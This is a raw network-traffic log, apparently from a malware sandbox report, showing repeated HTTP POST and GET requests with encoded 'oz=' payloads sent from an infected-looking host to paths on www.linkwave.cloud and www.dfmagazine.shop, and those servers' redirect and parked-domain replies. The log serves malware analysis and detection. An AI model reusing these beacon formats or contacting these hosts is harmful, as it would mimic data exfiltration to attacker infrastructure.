                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              67192.168.11.20497973.33.130.19080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:37.317085028 CEST833OUTPOST /was5/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Origin: http://www.linkwave.cloud
                                                                                                                                              Referer: http://www.linkwave.cloud/was5/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 50 4c 53 58 46 45 78 43 32 74 78 30 30 41 5a 42 45 75 4c 2f 44 33 49 56 43 69 66 46 30 7a 34 4e 31 73 30 35 4e 7a 48 5a 72 30 51 41 53 42 71 52 2b 49 56 45 6e 76 6a 6f 61 74 4d 52 50 47 62 45 62 6d 59 39 74 33 45 47 30 6e 6b 45 51 76 66 37 52 32 53 68 2b 73 38 43 54 45 43 67 41 76 63 39 38 57 61 56 74 6b 6d 69 73 37 6f 4d 55 6a 38 37 6b 6c 34 4d 69 6f 31 52 63 79 61 30 4d 43 42 63 2b 72 42 68 6d 56 70 54 38 2b 65 52 2b 2f 53 69 34 61 6f 2b 51 5a 4a 67 2f 4f 33 39 6a 72 67 61 4f 42 36 75 48 50 56 44 2b 66 46 36 6b 3d
                                                                                                                                              Data Ascii: oz=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+PLSXFExC2tx00AZBEuL/D3IVCifF0z4N1s05NzHZr0QASBqR+IVEnvjoatMRPGbEbmY9t3EG0nkEQvf7R2Sh+s8CTECgAvc98WaVtkmis7oMUj87kl4Mio1Rcya0MCBc+rBhmVpT8+eR+/Si4ao+QZJg/O39jrgaOB6uHPVD+fF6k=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              68192.168.11.20497983.33.130.19080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:39.954304934 CEST1289OUTPOST /was5/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Origin: http://www.linkwave.cloud
                                                                                                                                              Referer: http://www.linkwave.cloud/was5/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6b 2f 4b 42 6b 78 74 32 66 59 7a 77 6f 62 54 6d 75 47 30 69 49 54 34 42 30 68 63 33 66 2b 48 4c 53 45 4e 45 77 6c 61 74 77 30 30 41 51 68 45 56 4c 2f 44 32 49 52 75 75 66 46 34 4a 34 4c 78 73 6d 50 52 7a 50 4d 48 30 61 41 53 42 33 42 2b 4a 49 55 6e 66 6a 6f 4b 70 4d 52 66 47 62 45 62 6d 59 38 39 33 43 55 51 6e 69 45 51 67 63 37 52 71 46 78 2b 49 38 43 37 2b 43 68 42 59 64 4e 63 57 62 31 39 6b 6b 55 41 37 31 38 55 68 39 37 6b 39 34 4d 2b 4a 31 52 51 45 61 30 34 34 42 66 4f 72 41 41 50 36 37 58 6f 39 4c 42 71 39 59 7a 45 58 6b 38 5a 48 4a 44 7a 73 33 72 7a 64 68 66 47 4d 37 76 48 75 53 69 6e 55 53 2b 4d 51 73 67 65 77 4f 49 50 76 52 2f 51 45 58 54 2f 61 52 65 67 70 55 6c 42 33 52 59 66 6b 61 58 6b 6f 36 57 45 48 66 78 54 45 78 36 4f 2b 6d 71 44 6c 43 6e 34 53 52 66 57 6e 71 47 57 70 67 73 51 41 6e 56 35 65 55 33 6a 56 49 69 36 2b 77 43 55 4c 58 6e 37 59 44 51 41 59 36 2f 37 73 43 50 6b 78 35 7a 49 4a 56 50 67 62 43 38 64 67 62 47 4c 43 66 7a 6b 70 31 52 57 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=/+kHACa6XDHak/KBkxt2fYzwobTmuG0iIT4B0hc3f+HLSENEwlatw00AQhEVL/D2IRuufF4J4LxsmPRzPMH0aASB3B+JIUnfjoKpMRfGbEbmY893CUQniEQgc7RqFx+I8C7+ChBYdNcWb19kkUA718Uh97k94M+J1RQEa044BfOrAAP67Xo9LBq9YzEXk8ZHJDzs3rzdhfGM7vHuSinUS+MQsgewOIPvR/QEXT/aRegpUlB3RYfkaXko6WEHfxTEx6O+mqDlCn4SRfWnqGWpgsQAnV5eU3jVIi6+wCULXn7YDQAY6/7sCPkx5zIJVPgbC8dgbGLCfzkp1RWZbUpoul2vc17ArWAjBP8FoMzVOCl6NYqLATUjhhsAGGY5YGJmgD67ARbJx/xPYVSllGqJOHFuUhncOyl9kYBYbtMPu/xo3yURGubxTnumY40ICfHCan67lyOchR3Z8Yx2jKdHacyA7GhH/eLAY4O29H5p8E8IqlQEKsFERb9iiQbA5Pb9mjbOH6HlLcoLKGr9//y6yQMh07ucAJnJSYRueumSZaYBBXoTXT3/OzcU0NQuSzFZHOVUKYXM0MbtC7NNohE9C9ZvH9IVgGkPgHtiN0ZRUKEBxqr29bui9ZNJIpUDQ/lF2QhTh/3IOrSnOagAlKPTmNtz/LGJ1BO
                                                                                                                                              Oct 4, 2024 08:11:39.954355001 CEST3867OUTData Raw: 4d 2b 53 45 31 62 74 66 34 33 56 75 74 51 33 45 63 67 78 42 62 6b 7a 7a 4c 64 56 55 4a 4f 53 38 4b 39 78 79 5a 78 34 30 48 46 33 54 53 68 56 69 31 35 65 4a 52 6b 30 4f 46 39 75 36 74 7a 4f 34 49 42 39 78 33 51 56 6c 38 57 34 6c 79 46 37 41 68 50
                                                                                                                                              Data Ascii: M+SE1btf43VutQ3EcgxBbkzzLdVUJOS8K9xyZx40HF3TShVi15eJRk0OF9u6tzO4IB9x3QVl8W4lyF7AhPTYs3WlMoUuabsSQYsSysuW4nlbqn/rL9TZcgZuKLEr9NS3uq+eyoopr6cGjYfT5Dx+uDZsxzrlmczYDgbJzp/Kq+/HxuQX1KGmCBZ3xx8aY78FuXHuQ0GO/CZtJ1wu/tpkOdUbaUz8MxLiwmjJxbEGY2UxgAxu/oA
                                                                                                                                              Oct 4, 2024 08:11:39.954404116 CEST2826OUTData Raw: 77 2b 50 48 5a 51 77 5a 62 45 45 72 48 4b 54 70 46 32 74 77 30 42 42 54 4d 44 59 47 37 4c 31 5a 4e 2f 4e 6c 45 51 37 35 33 70 4a 4e 43 77 37 74 77 73 65 75 55 4f 48 7a 54 7a 4a 57 50 79 47 2f 6c 44 6f 55 77 6a 58 35 41 37 56 6f 34 61 58 36 50 4e
                                                                                                                                              Data Ascii: w+PHZQwZbEErHKTpF2tw0BBTMDYG7L1ZN/NlEQ753pJNCw7twseuUOHzTzJWPyG/lDoUwjX5A7Vo4aX6PNnzm3l7Cn/f8KtFTQ4Knwg1l4TsXOSipjAsgVS3tCVHaeq07CvwLAw9SGkVy85wAxKLfX2UrBD7ZhW+NncaqlSaUxyQs/QytYrUO/gA0Y8gjf0oIoKTnQ3mgmHoiftH9LNJp7ukCcpY6xQ+R5nwnPO6fKzfcD2PfZZ


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              69192.168.11.20497993.33.130.19080
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:42.590176105 CEST549OUTGET /was5/?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:11:42.691457033 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:11:42 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 7a 3d 79 38 4d 6e 44 33 43 41 55 6a 66 76 6c 62 43 61 78 41 56 61 63 36 33 47 76 4b 36 38 68 79 77 6b 56 51 63 6b 30 46 30 33 4d 4d 72 61 43 51 64 50 36 69 36 61 68 67 45 63 4b 53 39 39 53 38 6a 43 4d 41 66 52 64 31 45 67 76 59 42 49 6b 49 31 67 46 72 32 4a 4e 52 79 6d 6b 78 66 37 4b 55 72 50 69 62 69 71 49 7a 4b 34 50 43 4b 67 51 4e 39 71 48 69 77 56 6e 44 30 3d 26 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              70192.168.11.204980084.32.84.3280
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:47.810385942 CEST816OUTPOST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4d 70 75 50 44 42 76 4e 76 79 58 6c 30 6a 39 37 54 75 33 75 5a 4d 79 45 35 75 36 65 41 72 77 41 33 49 7a 2f 64 67 6d 35 78 76 39 39 4f 59 7a 75 46 70 47 77 2b 77 61 6c 61 6e 71 4a 41 69 64 2f 70 6d 44 43 34 79 34 72 48 43 44 69 41 56 41 32 6d 50 73 69 36 58 6f 74 42 6d 35 63 65 34 44 31 72 6a 73 31 38 42 70 49 61 6e 4a 55 47 70 77 79 55 45 4b 76 44 33 46 69 70 74 4a 42 62 71 6b 56 79 57 34 4b 34 4a 62 4e 43 68 56 77 4f 36 55 75 55 78 72 36 39 34 54 35 6c 38 54 52 32 41 32 52 70 77 30 56 64 6f 34 38 4d 42 44 45 66 38 52 35 50 49 65 4a 52 77 3d 3d
                                                                                                                                              Data Ascii: oz=4z1WU9RqYjadMpuPDBvNvyXl0j97Tu3uZMyE5u6eArwA3Iz/dgm5xv99OYzuFpGw+walanqJAid/pmDC4y4rHCDiAVA2mPsi6XotBm5ce4D1rjs18BpIanJUGpwyUEKvD3FiptJBbqkVyW4K4JbNChVwO6UuUxr694T5l8TR2A2Rpw0Vdo48MBDEf8R5PIeJRw==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              71192.168.11.204980184.32.84.3280
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:50.452119112 CEST836OUTPOST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 49 41 77 6f 44 2f 63 68 6d 35 30 76 39 39 4a 6f 7a 76 42 70 47 2f 2b 77 65 74 61 6d 57 4a 41 69 4a 2f 70 6d 54 43 35 44 34 6f 42 53 44 67 50 31 41 30 70 76 73 69 36 58 6f 74 42 6e 64 32 65 34 4c 31 6f 54 63 31 75 77 70 48 5a 6e 4a 62 4d 4a 77 79 44 30 4b 72 44 33 45 4e 70 73 55 6b 62 76 34 56 79 58 49 4b 35 62 7a 4f 49 68 56 36 45 61 56 35 54 51 79 4b 34 4d 32 4d 6b 39 4b 44 2f 6c 4b 4d 73 6d 6c 50 41 61 4d 59 50 53 66 32 62 4d 6f 52 4e 4b 66 53 4d 36 58 76 33 7a 54 50 36 4c 58 79 77 53 67 61 74 32 4d 54 37 70 67 3d
                                                                                                                                              Data Ascii: oz=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdIAwoD/chm50v99JozvBpG/+wetamWJAiJ/pmTC5D4oBSDgP1A0pvsi6XotBnd2e4L1oTc1uwpHZnJbMJwyD0KrD3ENpsUkbv4VyXIK5bzOIhV6EaV5TQyK4M2Mk9KD/lKMsmlPAaMYPSf2bMoRNKfSM6Xv3zTP6LXywSgat2MT7pg=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              72192.168.11.204980284.32.84.3280
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:53.091892004 CEST2578OUTPOST /7k8f/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Origin: http://www.dfmagazine.shop
                                                                                                                                              Referer: http://www.dfmagazine.shop/7k8f/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 34 7a 31 57 55 39 52 71 59 6a 61 64 4e 4a 2b 50 50 43 48 4e 71 53 58 6d 70 54 39 37 4b 2b 33 71 5a 4d 2b 45 35 75 54 44 41 64 41 41 77 62 4c 2f 64 47 61 35 33 76 39 39 4b 6f 7a 79 42 70 47 69 2b 32 32 70 61 6d 62 2b 41 67 78 2f 6d 6c 4c 43 2b 77 67 6f 50 53 44 67 58 31 41 33 6d 50 73 33 36 54 30 68 42 6d 74 32 65 34 4c 31 6f 51 45 31 74 68 70 48 56 48 4a 55 47 70 77 2b 55 45 4b 50 44 33 4d 33 70 73 51 61 63 62 30 56 79 33 59 4b 30 50 54 4f 45 68 56 38 48 61 56 78 54 51 4f 56 34 49 66 31 6b 39 50 59 2f 6a 75 4d 74 78 67 70 5a 49 4a 50 64 41 6e 47 52 63 55 51 45 34 57 43 44 72 44 57 78 41 33 5a 7a 2b 66 45 38 53 63 4d 39 33 63 34 35 75 75 6e 61 61 5a 66 45 4e 64 75 77 68 2b 67 69 7a 72 53 4d 4e 2b 4a 4c 6c 67 32 42 38 6b 6b 6d 2f 58 2b 63 76 75 4e 76 6c 63 64 59 4f 52 4b 54 54 6e 4d 47 6d 4a 62 34 57 69 79 38 35 57 49 4c 30 66 43 54 42 42 30 33 44 46 78 32 74 6a 38 65 52 6b 51 51 43 77 56 73 68 2f 63 34 37 4e 51 78 5a 78 53 71 51 4c 48 78 51 51 47 58 38 55 35 51 79 71 4a 47 48 54 2b 64 2f 31 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=4z1WU9RqYjadNJ+PPCHNqSXmpT97K+3qZM+E5uTDAdAAwbL/dGa53v99KozyBpGi+22pamb+Agx/mlLC+wgoPSDgX1A3mPs36T0hBmt2e4L1oQE1thpHVHJUGpw+UEKPD3M3psQacb0Vy3YK0PTOEhV8HaVxTQOV4If1k9PY/juMtxgpZIJPdAnGRcUQE4WCDrDWxA3Zz+fE8ScM93c45uunaaZfENduwh+gizrSMN+JLlg2B8kkm/X+cvuNvlcdYORKTTnMGmJb4Wiy85WIL0fCTBB03DFx2tj8eRkQQCwVsh/c47NQxZxSqQLHxQQGX8U5QyqJGHT+d/1dPE3YcYiFDAHq0DcYLr9xKKlqrotLKHPtKM3cUJDPz8N9d7wzaNc356vNlW8JILLWvNYqTBj3RV+gFZiJyqngSgDpxaog+vgA6KG/lbnEMIrHbpK0uNnpVteKyfA9Zmyr5a3BKvP43ZifrqUi31IXdPfLvVridjP6/pZnYlEcMr0lLxjkYsahQFuUgzz+39UA/+6f2MblZHYFBmUPiZPImuLVet19ORlRz9XgwkrY4TIhqOEzmXe+fGqPJTUfycYt6a+TpndN3VJcdJUEtR+T+kP0RDwru2HPFUWXzmgo3RuaLhVM3gvg/2Y+uwf8FOQDiMz7+GNAH+fuO6nOSDKU/awjbIUWZF1GFSpm9RuZ028bC902hqSomWouNJCKYh1Lk5yn8hN2six9bbofsycXfCKa5vCjADBdyXl1AVFwlVusfCsZov6jJ9isUf5WlrbayYUQ/VCINmeIHKZfccDvxclR8pSQzO3eO7q71Ob0M6iY5ZTixCWYfuznMRNtcttdbHfnc21pOvTAQgUbhIMvFp3D1w6Fx8KH+OdTusBicK4RT326in5gRywGs6gzwsqvyPTMRzOHF2qTxtzQrHaS/mulbQi8RI+d54WQF6YhyWZgutdBVZVeBoKDRJRs2cXuYwuo7IoXHmUOOLlGJRpexl2jt1qS7gNeO [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:11:53.091913939 CEST3867OUTData Raw: 69 4d 6d 39 49 54 34 4b 4c 49 61 50 62 45 37 61 55 35 4f 7a 6f 78 71 42 35 34 76 75 2f 6e 53 72 36 4d 38 44 4f 62 4d 58 51 6f 49 6d 6e 61 5a 2f 35 30 4d 51 67 75 73 64 37 77 31 63 4a 55 63 45 35 69 65 4f 76 68 62 65 46 53 31 46 48 41 64 55 59 34
                                                                                                                                              Data Ascii: iMm9IT4KLIaPbE7aU5OzoxqB54vu/nSr6M8DObMXQoImnaZ/50MQgusd7w1cJUcE5ieOvhbeFS1FHAdUY4cGV5K5X8Iz2r0ZyZNEx/2BV3pNKSgZpnlqqVY2ZttHqIXiPHcDbQmdy4WpHfysFraQGtyy5NdMulyMOTrXmG+OybZgnPxk5SXeqfvb1Bx+uoCqGxE/lHcvw7Pbg8CM6OSVWfscA/6vkfDzR035+2ImhOzbd/Q29T1
                                                                                                                                              Oct 4, 2024 08:11:53.092005968 CEST1540OUTData Raw: 39 6b 4d 56 42 4b 37 4a 7a 4c 4b 64 45 6c 30 44 77 59 61 5a 35 6f 58 4e 62 45 53 55 70 66 6b 31 4a 78 5a 4d 51 54 31 56 43 76 76 2f 57 41 48 6c 58 69 49 43 52 6e 43 6f 4a 74 54 63 72 6e 50 41 52 31 35 52 44 74 6e 54 55 71 65 37 39 31 58 30 44 58
                                                                                                                                              Data Ascii: 9kMVBK7JzLKdEl0DwYaZ5oXNbESUpfk1JxZMQT1VCvv/WAHlXiICRnCoJtTcrnPAR15RDtnTUqe791X0DXDobt5+E5VG604xOFmTpHNR9EjFlHZNzP7hpI+6uRbxDco9FXA+TRSizsggilzQ/0sMa1MUGwcVLyur6FmB53CZehLr0HuONJFcZLo72YRTuNmLi3zWJqIM5YWVKw06mYGYAG55U/9IFxQCjldJjgnT8ciuWmdS61Y


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              73192.168.11.204980384.32.84.3280
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:55.729990959 CEST550OUTGET /7k8f/?oz=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.dfmagazine.shop
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:11:55.831248999 CEST1289INHTTP/1.1 200 OK
                                                                                                                                              Server: hcdn
                                                                                                                                              Date: Fri, 04 Oct 2024 06:11:55 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 10072
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              x-hcdn-request-id: d792afb1d6d873eb066a690ae75c39ba-bos-edge1
                                                                                                                                              Expires: Fri, 04 Oct 2024 06:11:54 GMT
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                                                                                              Oct 4, 2024 08:11:55.831346989 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                                                                                              Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                                                                                              Oct 4, 2024 08:11:55.831407070 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                                                                                              Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                                                                                              Oct 4, 2024 08:11:55.831487894 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                                                                                              Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
